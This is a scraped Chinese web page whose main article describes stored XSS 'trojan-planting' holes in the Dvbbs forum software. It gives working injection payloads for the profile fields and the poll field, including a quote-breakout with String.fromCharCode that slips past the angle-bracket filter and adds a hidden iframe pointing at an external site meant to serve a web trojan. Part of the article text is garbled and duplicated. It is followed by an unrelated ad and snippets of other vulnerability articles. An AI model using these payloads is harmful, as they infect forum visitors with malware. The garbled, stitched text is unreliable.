新思路现动网新漏洞_漏洞研究

作者:优格GXU 文章来源:邪恶八进制信息安全团队  

文章作者:优格[GXU] (www.wuzhou.org)  

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)  

原文下载:http://www.wuzhou.org/dvbbs.doc  

前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了。正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知。  

相信大家都看过《终结动网最新挂马方法!》的文章了,其实这个漏洞已经出现了大概半月了,后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码:  

</Script><IfraMe height=0 width=0 src="http://www.wuzhou.org"></IfraMe>  

在MSN中写入代码:  

<Script Language=JavaScript>var actioninfo3='单帖屏蔽'  

其中木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。 href="http://www.wuzhou.org为你的网页木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。/" target=_blank>http://www.wuzhou.org为你的网页木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。  

首先,我们发表一个投票看看。如图1  

我们看一下源文件:  

<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>  

其中ssssssssss是我们自由写入的,那么我们能不能对源文件进行欺骗,从而让它运行我们的代码呢?打个比方,一个括号:(),当我们在()内写进)和(,那就变成了两个括号。道理是相同的,我们也可以这样进行代码欺骗。我们在发表投票中写入:  

';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='  

在这里顺便说一下,动网的投票功能没有进行严密的过滤,当写入的投票项目为网页代码时,代码照样可以执行,而且写入的代码并不按照它所说的“每行一个投票项目,最多10个”,并没有分行。发表投票后,查看源文件:  

<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>  

代码是无法执行的,动网进行了过滤。再次饶过思路,动网只是对<和>进行过滤,对+'/等符号没有过滤。再次在投票那写入代码:  

';document.all.popmenu.innerHTML=document.all.popmenu.innerHTML+String.fromCharCode(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src=http://www.wuzhou.org width=0'+String.fromCharCode(62)+String.fromCharCode(60)+'/IFRAME'+String.fromCharCode(62);var vote='1  

发表后成功跳转了www.wuzhou.org这个站。如果我们把站改成我们的网页木马,那么一个木马贴就这样完成了。其实这只是动网代码欺骗的一小部分,还有不少的地方可以进行代码欺骗,比如用户头像,联系方法等。  

后记:现在很多的程序作者并没有看到到代码欺骗这安全危害,在我看的很多网站程序,不管是asp还是php的,都有许多程序可以进行代码欺骗,希望这篇文章能起到抛砖引玉的效果,让各位朋友找到更多的漏洞。  

时间: 2024-11-05 16:35:05

新思路现动网新漏洞_漏洞研究的相关文章

加盟中国E动网新动力网盟

中介交易 SEO诊断 淘宝客 云主机 技术大厅 为何要加盟"中国E动网新动力网盟"? 全国首创的可持续收入方式,让您 轻松得到最大利益回报.诚信 合法 规范的中国E动网将给你最大的支付保证信誉 立即加盟广告联盟新动力,站长赚钱新选择 1+10=200 可持续收入让你轻松拥有博客主机 1+10=200第一年,1个博客主机网站一年介绍10个朋友购买博客主机得到10元注册佣金+200元消费佣金=你自己的博客主机每年的费用.第二年,您介绍10个朋友续费博客主机得到200元续费佣金=你自己的博客

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞_漏洞研究

漏洞发现:LiNZI[B.C.T]@www.cnbct.org  厂商名字:动网先锋论谈  厂商地址:http://www.dvbbs.net/  漏洞程序:Dvbbs 7.1.0  漏洞描述:  Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等.  漏洞利用例子:  一.泄露绝对漏洞测试:  对官方的测试站点:bbs.dvbbs.net  上传一张图,代码如下:  GIF89a  <script>alert(document.c

研究桃源留言本的漏洞_漏洞研究

桃源留言本是桃源工作室http://www.mytaoyuan.com/开发的一个asp留言系统.由于桃源留言本界面清新,功能强大,简洁适用,所以被一些大大小小的网站所采用,受到许多站长的好评.桃源留言本由原来的2.0版,升级到现在的3.0版.其官方网站也是3.0版.前段时间,我在入侵我们学校的网站的时候,发现了一个部门的网站上有这个留言本.于是引起了我对它的一番研究,我下载了各个版本的源代码,读了部分代码之后,发现漏洞还真不少.      一.上传漏洞     我在网上搜索的时候,发现已经有人

2007 10.30动易网站管理系统vote.asp页面存在SQL注入漏洞_漏洞研究

测试系统:         动易(PowerEasy CMS SP6 071030以下版本) 安全综述:        动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品. 漏洞描述:     vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入     但是其语句里面过滤了-- ;等字符,又是一个UPDATE形的注入,有一定的限制.但是其过滤的顺序不对.有导致mss

解密DDoS攻击——“缓存溢出”新变形_漏洞研究

在windows系统中,同样存在着缓存溢出的问题.而且,随着internet的普及,win系列平台上的internet服务程序越来越多,低水平的win程序就成为你系统上的致命伤,因为它们同样会发生远程堆栈溢出.而且,由于win系统使用者和管理者普遍缺乏安全防范意识,一台win系统上的堆栈溢出,如果被恶意利用,将导致整个机器被黑客所控制,进而可能导致整个局域网落入黑客之手.在微软的产品iis server4.0中就被发现存在一种被称为"非法htr请求"的缺陷.据微软称,此缺陷在特定情况下

phpBB论坛程序:老革命遇见新问题_漏洞研究

phpBB 2.0.18 XSS and Full Path Disclosure  Details: SecurityAlert    还有一个是暴力破解的工具,单线程的, 也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码  下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar       Topic : phpBB 2.0.18 XSS and Full Path Disclosure      SecurityAlert

蓝雨设计整站SQL注入漏洞_漏洞研究

本来是投稿文章来的,因为稿件的问题所以就上不了杂志,再加上最近有些人在网站留言说三道四的猜测蓝雨的问题,所以我就公开漏洞预警所说的漏洞,官方已经把版本都打了补丁,当然有些使用网站至今还是存在着SQL注入漏洞的,所以一切后果与我以及BCT小组无关  最近无聊,在网上走来走去看看.发现现在的整站系统可是越来越多了,修改版本等等的N多阿!而蓝雨设计整站的使用者也越来越多了,蓝雨整站系统是从NOWA 0.94修改而来的!基于NOWA的系统不单指蓝雨一个还有很多的!我在此就不一一列举了,核心都是一样,只是

WDB论坛存在多个严重漏洞_漏洞研究

===============================================  仅以此文送给我的好友Bytes,  并祝他和他的女友璐子能够真的相爱一生,白头偕老  ===============================================  前言:  我在和很多网管谈到WEB安全的时候,很多人告诉我WEB安全就是sql injection,"不就是在一个变量后面嵌入你的sql语句么,这个我也会",这是我听到最多的人们对WEB安全的认识,WEB安全

BBSXP5.15跨站攻击漏洞_漏洞研究

前言:在新云网站管理系统1.02出来的时候,他的留言本就存在跨站漏洞,我测试了黑客动画吧,还好没有开放留言本功能,然后又测试了黑软基地 居然可以成功利用,和新云官方网站都成功拿倒了管理元的cookies.  想不到吧. 看来跨站不得不防范啊!  BBSXP的漏洞近段时间闹得可火.现有的漏洞大家都见过了,就不说了.今晚无聊,看了看BBSXP 5.15最新版的几个文件代码,发现还是存在跨站攻击的漏洞.  Cookies.asp文件,代码如下:   对提交的 "no" 参数没做处理.再看se